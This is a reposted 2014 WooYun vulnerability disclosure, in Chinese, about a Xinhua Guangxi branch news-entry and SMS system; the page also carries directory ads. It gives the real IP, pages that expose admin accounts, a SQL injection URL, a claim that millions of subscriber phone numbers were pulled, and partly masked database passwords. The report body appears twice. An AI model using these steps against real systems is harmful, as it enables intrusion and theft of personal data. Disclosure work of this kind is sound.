网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

[公开漏洞]新华社某分社信息录入系统与短信系统文件遍历与注入导致大量用户手机泄露

来源:WooYun 浏览:679次 时间:2014-06-12
简介:新华社某分社信息录入系统与短信系统文件遍历与注入导致大量用户手机泄露 相关厂商: 新华社漏洞作者:小威 提交时间:2014-04-24 08:49 公开时间:2014-06-08 08:49 漏洞类型:重要敏感信息泄露危害等级:高 自评R

新华社某分社信息录入系统与短信系统文件遍历与注入导致大量用户手机泄露 相关厂商: 新华社 漏洞作者:小威 提交时间:2014-04-24 08:49 公开时间:2014-06-08 08:49 漏洞类型:重要敏感信息泄露 危害等级:高 自评Rank:18 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 目录遍历 敏感信息泄露 默认配置不当 内部敏感信息泄漏 漏洞详情 披露状态:

2014-04-24:细节已通知厂商并且等待厂商处理中
2014-04-29:厂商已经确认,细节仅向厂商公开
2014-05-09:细节向核心白帽子及相关领域专家公开
2014-05-19:细节向普通白帽子公开
2014-05-29:细节向实习白帽子公开
2014-06-08:细节向公众公开

简要描述:

现有的文件便利之后又想到了注入~

详细说明:

地址:http://218.57.170.91:8080/ 广西新华社信息录入系统



1)系统存在文件遍历:

http://218.57.170.91:8080/adduser.asp

http://218.57.170.91:8080/modify.asp



此处可直接获取管理员帐号密码

02任意用户修改.jpg



或者可自己添加一个账户

.jpg





随便找个权限为“1”(1为最大)的帐号登录

01新闻录入.jpg







2)登录账户后 注入点 http://218.57.170.91:8080/view.asp?dd=69701



.jpg





注射到表段发现,此站不单单是个信息录入平台,而且还有大量的手机用户订阅信息。

QQ截图20140423235345.jpg





出去了会回来 数据已经跑到了1000000多万 估计总体在几百万左右吧

.jpg





可获取服务器内容:

.jpg





3)其它一些小地方:(关键处打码)

[ManageDB]
DBServerName=.
DBName=managedb
UserID=sa
PassWord=ch***55

[iAgentDB]
DBServerName=.
DBName=iagentdb
UserID=sa
PassWord=ch***55

[infodb]
DBServerName=.
DBName=info
UserID=sa
PassWord=ch***55





短信发送服务器配置信息(贴出一小段):(关键处打码)



[Public]
;网号
NetID=1
;网名
NetName=1
;站点代码
ComID=053*
;站点名称
ComName=维坊信息台
;中心联网服务所在URL地址
UniteServiceURL=http://192.***.**.60/uniteservice/
;中心联网数据源所在URL地址
DistributeURL=http://192.***.**.60/wwwdata/
;此项设置为运行写服务日志和通道日志的组件所在的机器名称
LOGSERVER=192.***.**.60
AppManagerSvr=192.***.**.60

[iAgent]
;iAgent本地数据库服务器名称
DBServerName=192.***.**.60
;iAgent本地数据库名称
DBName=iAgentDB
;iAgent本地数据库用户代码
UserID=sa
;iAgent本地数据库用户口令
PassWord=ch***55
;发送短信息的MTS服务器名称
SMintfMachine=192.***.**.60
;短信息发送的服务号
SMintfServiceID=8
;iAgent本地URL地址
iAgentURL=http://192.***.**./iAgent/
;支持的终端列表
Terminal=www;wap;cti

[iAgentCenterDB]
;iAgent中心数据库服务器名称
DBServerName=192.***.**.60
;iAgent中心数据库名称
DBName=uniteservicecenter
;iAgent中心数据库用户代码
UserID=sa
;iAgent中心数据库用户口令
PassWord=ch***55

[LocalInfo]
;数据库所在的机器名称
DBServerName=192.***.**.60
;数据库名称
DBName=LocalinfoDB
;连接数据库使用的帐号
UserID=sa
;连接数据库使用的帐号密码
PassWord=ch***55
;日志文件路径
LogFilePath=C:\LDLogFile
;代理服务器的主机地址
ProxyHost=
;代理服务器的端口号
ProxyPort=80
;本地数据库对外输出数据的URL地址
LocalinfoUrl=HTTP://192.***.**.60/LocalInfoData/
;本地数据库模块对外公布的ASP对象名称说明





漏洞证明:

1)系统存在文件遍历:

http://218.57.170.91:8080/adduser.asp

http://218.57.170.91:8080/modify.asp



此处可直接获取管理员帐号密码

02任意用户修改.jpg



或者可自己添加一个账户

.jpg





随便找个权限为“1”(1为最大)的帐号登录

01新闻录入.jpg







2)登录账户后 注入点 http://218.57.170.91:8080/view.asp?dd=69701



.jpg





注射到表段发现,此站不单单是个信息录入平台,而且还有大量的手机用户订阅信息。

QQ截图20140423235345.jpg





出去了会回来 数据已经跑到了1000000多万 估计总体在几百万左右吧

.jpg





可获取服务器内容:

.jpg





3)其它一些小地方:(关键处打码)

[ManageDB]
DBServerName=.
DBName=managedb
UserID=sa
PassWord=ch***55

[iAgentDB]
DBServerName=.
DBName=iagentdb
UserID=sa
PassWord=ch***55

[infodb]
DBServerName=.
DBName=info
UserID=sa
PassWord=ch***55





短信发送服务器配置信息(贴出一小段):(关键处打码)



[Public]
;网号
NetID=1
;网名
NetName=1
;站点代码
ComID=053*
;站点名称
ComName=维坊信息台
;中心联网服务所在URL地址
UniteServiceURL=http://192.***.**.60/uniteservice/
;中心联网数据源所在URL地址
DistributeURL=http://192.***.**.60/wwwdata/
;此项设置为运行写服务日志和通道日志的组件所在的机器名称
LOGSERVER=192.***.**.60
AppManagerSvr=192.***.**.60

[iAgent]
;iAgent本地数据库服务器名称
DBServerName=192.***.**.60
;iAgent本地数据库名称
DBName=iAgentDB
;iAgent本地数据库用户代码
UserID=sa
;iAgent本地数据库用户口令
PassWord=ch***55
;发送短信息的MTS服务器名称
SMintfMachine=192.***.**.60
;短信息发送的服务号
SMintfServiceID=8
;iAgent本地URL地址
iAgentURL=http://192.***.**./iAgent/
;支持的终端列表
Terminal=www;wap;cti

[iAgentCenterDB]
;iAgent中心数据库服务器名称
DBServerName=192.***.**.60
;iAgent中心数据库名称
DBName=uniteservicecenter
;iAgent中心数据库用户代码
UserID=sa
;iAgent中心数据库用户口令
PassWord=ch***55

[LocalInfo]
;数据库所在的机器名称
DBServerName=192.***.**.60
;数据库名称
DBName=LocalinfoDB
;连接数据库使用的帐号
UserID=sa
;连接数据库使用的帐号密码
PassWord=ch***55
;日志文件路径
LogFilePath=C:\LDLogFile
;代理服务器的主机地址
ProxyHost=
;代理服务器的端口号
ProxyPort=80
;本地数据库对外输出数据的URL地址
LocalinfoUrl=HTTP://192.***.**.60/LocalInfoData/
;本地数据库模块对外公布的ASP对象名称说明

修复方案:

版权声明:转载请注明来源 小威@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-04-29 08:30

厂商回复:

CNVD确认并复现所述情况,转由CNCERT直接向网站管理单位通报,并同时下发给了广西分中心加快处置进度。

最新状态:

2014-04-30:根据新华社广西分社后续反馈情况,网站为分社手机短信部2006年与一家通讯公司合作开发短信上传系统,只使用了两年,从2008年分社已停止与 该公司的合作,不再使用该系统。目前分社已与该合作公司联系,并已关闭该系统。


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/1584.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站